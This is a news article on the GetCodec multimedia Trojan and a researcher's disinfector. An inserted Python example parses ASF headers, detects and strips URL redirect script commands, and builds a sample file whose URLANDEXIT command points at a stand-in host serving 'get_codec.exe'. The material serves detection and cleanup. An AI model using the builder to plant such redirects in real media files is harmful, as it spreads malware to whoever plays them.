
Researcher disinfects multimedia Trojans

Robert Westervelt, News Director

A Polish security researcher who is investigating how attackers are using a multimedia Trojan to infect audio and video files on peer-to-peer networks has released a tool to disinfect the affected files.


Marcin Noga, a security researcher with Hispasec Sistemas, said the multimedia Trojan, which antivirus vendors first detected in July, is built to stay ahead of antivirus signatures.

The Trojan, dubbed GetCodec, embeds itself in files that use Microsoft's Advanced Systems Format (ASF), the container behind Windows Media Audio (WMA) and Windows Media Video (WMV) files. When an infected media file is opened, Windows Media Player is redirected to a malicious site hosting a fake codec and malware.

According to Noga's reverse engineering analysis, the malware makers can change the URL for the coder/decoder (codec) download on the server side, delivering any type of content and updating the file as quickly as antivirus vendors update their signatures. So far, it's been successfully spreading throughout P2P networks and could be a menace in corporate environments, government agencies and schools, Noga said.

"This is yet another example of how the combination of technique and social engineering is a nice cocktail when aiming at high propagation rates," Noga wrote in a research paper entitled "GetCodec Multimedia Trojan Analysis."

Noga released a multimedia Trojan disinfector that he says could cure infected files.
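The two points above, the ASF embedding that triggers the redirect and a disinfector that removes it, can be shown together. The following Python is an added example, not Noga's tool and not GetCodec code. It assumes, as the article does not specify, that the redirect rides in an ASF Script Command object whose command type is URL or URLANDEXIT, which Windows Media Player acts on during playback; the sample file, the placeholder host codec.example.invalid, and the Content Description object used as filler are constructed for the demonstration. The GUIDs are the published ASF object identifiers.

```python
import struct
import uuid

# Top-level ASF object GUIDs (stored on disk in Windows little-endian GUID layout).
HEADER_OBJECT = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C")
CONTENT_DESCRIPTION_OBJECT = uuid.UUID("75B22633-668E-11CF-A6D9-00AA0062CE6C")
SCRIPT_COMMAND_OBJECT = uuid.UUID("7BF875CE-468D-11D1-8D82-006097C9A2B2")
SCRIPT_COMMAND_RESERVED = uuid.UUID("4B1ACBE3-100B-11D0-A39B-00A0C90348F6")

# Command types that make the player fetch a URL. "URLANDEXIT" is the
# Windows Media Player-specific type that also stops playback afterwards.
URL_COMMAND_TYPES = {"URL", "URLANDEXIT"}


def _utf16(s: str) -> bytes:
    return s.encode("utf-16-le")


def build_script_command_object(commands):
    """commands: list of (presentation_time_ms, type_name, command_text)."""
    types = []
    for _, t, _ in commands:
        if t not in types:
            types.append(t)
    body = SCRIPT_COMMAND_RESERVED.bytes_le
    body += struct.pack("<HH", len(commands), len(types))
    for t in types:                              # lengths count UTF-16 code units
        body += struct.pack("<H", len(t)) + _utf16(t)
    for t_ms, t, text in commands:
        body += struct.pack("<IHH", t_ms, types.index(t), len(text)) + _utf16(text)
    return SCRIPT_COMMAND_OBJECT.bytes_le + struct.pack("<Q", 24 + len(body)) + body


def build_header(children):
    """Header Object: GUID, QWORD size, DWORD child count, reserved bytes 0x01 0x02."""
    body = b"".join(children)
    return (HEADER_OBJECT.bytes_le
            + struct.pack("<QIBB", 30 + len(body), len(children), 1, 2)
            + body)


def iter_header_objects(data: bytes):
    """Yield (guid, raw_object_bytes) for each top-level child of the header."""
    if uuid.UUID(bytes_le=data[:16]) != HEADER_OBJECT:
        raise ValueError("not an ASF file")
    header_size, count = struct.unpack_from("<QI", data, 16)
    off = 30
    for _ in range(count):
        if off + 24 > header_size:
            raise ValueError("truncated header object list")
        guid = uuid.UUID(bytes_le=data[off:off + 16])
        size, = struct.unpack_from("<Q", data, off + 16)
        if size < 24 or off + size > header_size:
            raise ValueError("child object size out of bounds")
        yield guid, data[off:off + size]
        off += size


def parse_script_commands(obj: bytes):
    """Decode a Script Command object into [(time_ms, type_name, text)]."""
    p = 24 + 16                                  # object header + reserved GUID
    n_cmds, n_types = struct.unpack_from("<HH", obj, p)
    p += 4
    types = []
    for _ in range(n_types):
        n, = struct.unpack_from("<H", obj, p)
        p += 2
        types.append(obj[p:p + 2 * n].decode("utf-16-le"))
        p += 2 * n
    cmds = []
    for _ in range(n_cmds):
        t_ms, idx, n = struct.unpack_from("<IHH", obj, p)
        p += 8
        if idx >= len(types) or p + 2 * n > len(obj):
            raise ValueError("malformed script command")
        cmds.append((t_ms, types[idx], obj[p:p + 2 * n].decode("utf-16-le")))
        p += 2 * n
    return cmds


def find_redirects(data: bytes):
    """Return every script command that would make the player open a URL."""
    hits = []
    for guid, obj in iter_header_objects(data):
        if guid == SCRIPT_COMMAND_OBJECT:
            for cmd in parse_script_commands(obj):
                if cmd[1].upper() in URL_COMMAND_TYPES or cmd[2].lower().startswith("http"):
                    hits.append(cmd)
    return hits


def strip_script_commands(data: bytes) -> bytes:
    """Rebuild the header without Script Command objects; keep everything after it."""
    header_size, = struct.unpack_from("<Q", data, 16)
    kept = [obj for guid, obj in iter_header_objects(data) if guid != SCRIPT_COMMAND_OBJECT]
    return build_header(kept) + data[header_size:]


def build_sample_file() -> bytes:
    """Constructed input: an empty Content Description object, a URLANDEXIT command
    pointing at a placeholder host, and bytes standing in for the Data Object."""
    content_desc = CONTENT_DESCRIPTION_OBJECT.bytes_le + struct.pack("<Q", 34) + b"\x00" * 10
    redirect = build_script_command_object(
        [(0, "URLANDEXIT", "http://codec.example.invalid/get_codec.exe")])
    return build_header([content_desc, redirect]) + b"DATA-OBJECT-PLACEHOLDER"


if __name__ == "__main__":
    sample = build_sample_file()
    for t_ms, kind, text in find_redirects(sample):
        print(f"redirect at {t_ms} ms: {kind} -> {text}")
    print("after disinfection:", find_redirects(strip_script_commands(sample)))
```

Stripping the object from the top-level header leaves the file playable but stale in one respect: the File Properties Object records the total file size, so a real disinfector would also patch that field, and would walk the Header Extension Object for nested children rather than only the top level as this example does.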

In an email exchange, Noga said the GetCodec Trojan isn't complicated and appeared to have unfinished code. Currently the Trojan is infecting files at very low levels, he said.

"The author used standard Windows APIs and appropriate COM interfaces to search and manipulate data," Noga said. "It didn't contain an anti-debug mechanism or a Virtual Machine detection technique, which I have the 'pleasure' to often see in bank Trojans."

Researchers at Secure Computing Corp. were among the first to spot the new media Trojan. A similar attack was detected in May, when McAfee Inc. discovered infections on more than 360,000 machines.

